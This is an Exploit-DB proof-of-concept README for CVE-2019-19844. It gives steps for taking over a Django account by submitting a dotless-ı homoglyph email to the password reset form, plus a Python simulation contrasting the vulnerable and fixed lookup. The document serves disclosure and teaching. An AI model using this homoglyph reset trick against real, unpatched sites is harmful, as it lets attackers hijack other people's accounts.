EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47879.zip

# django_cve_2019_19844_poc

PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/): account takeover through Django's password reset form, which looked up the account with a case-insensitive (`email__iexact`) query and then mailed the reset link to the address typed into the form rather than the address stored on the account.

# Requirements

- Python 3.7.x
- PostgreSQL 9.5 or higher

## Setup

1. Create a database (e.g. `django_cve_2019_19844_poc`)
2. Set the database name in the environment variable `DJANGO_DATABASE_NAME` (e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
3. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
4. Create the following user from the `./manage.py shell` command:

```python
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
```

## Procedure For Reproducing

1. Run `./manage.py runserver`
2. Open `http://127.0.0.1:8000/accounts/password-reset/`
3. Input `mıke@example.org` (the attacker's email; note the dotless `ı`, U+0131, which uppercases to `I` so PostgreSQL's case-insensitive comparison matches the victim's `mike@example.org`), and click the send button
4. Receive the email (check the console, where the reset link is sent to the attacker's address), and reset the password
5. Login as the `mike123` user
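The following is an added example, not part of this PoC or of Django itself. It reproduces the lookup-and-recipient logic behind the procedure above in plain Python so the case-collision can be seen without a database: a constructed in-memory user list stands in for the `auth_user` table, `str.upper()` stands in for the `UPPER()` comparison that `email__iexact` becomes on PostgreSQL (both apply the Unicode simple case mapping, under which U+0131 becomes `I`), and the hardened variant applies the two changes the Django fix made: an NFKC-normalised casefold comparison against the stored address, and mailing the stored address rather than the submitted one.

```python
import unicodedata

# Constructed stand-in for the auth_user table created in the Setup section.
USERS = [
    {"username": "mike123", "email": "mike@example.org", "usable_password": True},
]


def _iexact_matches(submitted_email):
    # email__iexact on PostgreSQL compiles to UPPER(email) = UPPER(%s);
    # Python's str.upper() uses the same Unicode case mapping, so the
    # dotless i (U+0131) collides with ASCII 'i' here just as it does there.
    return [u for u in USERS if u["email"].upper() == submitted_email.upper()]


def reset_recipients_vulnerable(submitted_email):
    """Pre-fix behaviour: case-insensitive lookup, mail sent to the
    address typed into the form. Returns the list of recipient addresses."""
    return [submitted_email for _ in _iexact_matches(submitted_email)
            ]


def unicode_ci_compare(s1, s2):
    """Same comparison Django added in the fix: NFKC-normalise both sides,
    then casefold, so 'ı' no longer folds together with 'i'."""
    return (unicodedata.normalize("NFKC", s1).casefold()
            == unicodedata.normalize("NFKC", s2).casefold())


def reset_recipients_fixed(submitted_email):
    """Post-fix behaviour: keep the iexact query, but only accept accounts
    whose stored address also passes the casefold check, and mail the
    stored address. Returns the list of recipient addresses."""
    return [
        u["email"]
        for u in _iexact_matches(submitted_email)
        if u["usable_password"] and unicode_ci_compare(submitted_email, u["email"])
    ]


if __name__ == "__main__":
    attacker = "m\u0131ke@example.org"   # mıke@example.org from the Procedure
    print("vulnerable:", reset_recipients_vulnerable(attacker))  # attacker gets the link
    print("fixed:     ", reset_recipients_fixed(attacker))       # no mail at all
    print("fixed, legitimate case variant:", reset_recipients_fixed("MIKE@example.org"))
```

The vulnerable path returns the attacker-controlled address as the recipient, which is exactly what step 4 of the procedure shows on the console; the fixed path returns nothing for the homoglyph and still serves a plain ASCII case variant of the real address, so ordinary users are not locked out by the change.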